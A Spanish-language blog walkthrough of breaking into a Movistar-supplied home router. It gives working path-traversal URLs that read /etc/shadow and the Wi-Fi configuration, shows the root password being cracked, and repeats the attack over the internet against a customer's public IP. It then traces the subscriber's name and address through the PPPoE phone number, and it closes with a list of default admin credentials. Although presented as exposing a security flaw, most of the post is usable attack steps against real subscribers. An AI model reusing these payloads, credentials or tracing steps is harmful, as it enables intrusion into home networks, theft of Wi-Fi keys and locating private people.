Aquí les mostraremos una de las grandes deficiencias de seguridad en este modelo y que Movistar entrega a sus clientes en forma masiva.
1.- Ya que estamos conectados en forma local, veamos que puertos tiene abiertos
Puertos abiertos: 22 y 8000 para administración
2.- Veamos que nos muestra el puerto 8000
Por lo pronto no poseemos las credenciales para ingresar, pero sabemos que es la interfaz de configuracion
3.- LFI y Directory Path Traversal: con esta vulnerabilidad podemos entrar a la interfaz de administración sin necesidad de las credenciales ademas de conseguir el archivo "shadow" que se encuentra en el router.
http://192.168.1.1:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/shadow&var:menu=advanced&var:page=dns
4. Excelente, ahora copiamos el archivo en un txt y usamos Jhon the Ripper para obtener la clave de root.
No era muy dificil, era user "root" y pass "root" :P
5.- Ahora nos conectamos localmente por ssh al router y comenzamos a navegar por las carpetas buscando archivos interesantes, como los archivos de configuración, donde nos encontramos con la clave WPA en texto plano ademas del nombre de la red y mucha información interesante.
http://192.168.1.1:80
6.- WOW!! Tenemos la clave WPA en texto plano, muy bien, todo esto ha sido en forma local, pero servira a traves de internet?? Hagamos un pequeño scan para ver si podemos ver el puerto 22 abierto en el segmento de Movistar
7.- Vemos que esta filtrado, veamos el puerto 8000
8.- Excelente, están abiertos, como sabemos, es posible acceder a la configuración del router sin necesidad de credenciales
http://192.168.1.1:8000/cgi-bin/webproc?getpage=html/index.html&var:menu=setup&var:page=wireless&var:subpage=wlbasic
9.- Ya estamos adentro, ahora recopilaremos la informacion de la red y veremos que tipo de seguridad tiene la red inalambrica
10.- Veamos si la podemos obtener a travez dela url y ademas en texto plano
http://201.246.x.x:8000/cgi-bin/webproc?getpage=../../../../../../../../../../../../var/config/wlan0.conf&var:menu=advanced&var:page=dns
11.- WOW!!Genial, tenemos la clave WPA y el SSID, pero donde estará esta red?? Bueno, solo tenemos que revisar la configuración PPPoE y ver el numero de teléfono asignado
12.- Luego buscar el telefono en alguna pagina como, amarillas.cl o a veces aparecen en mapcity.cl, nos dira a quien pertenece, direccion y su ubicacion en el mapa :D
Como ven, su privacidad depende de la seguridad de sus proveedores, espero que les haya parecido interesante.
@_mshinc_
PD: Algunos user antiguos para el puerto 8000
usuario:password
telefonica user:user
User:M0V15tar$$
telefonica user:user
User:M0V15tar$$
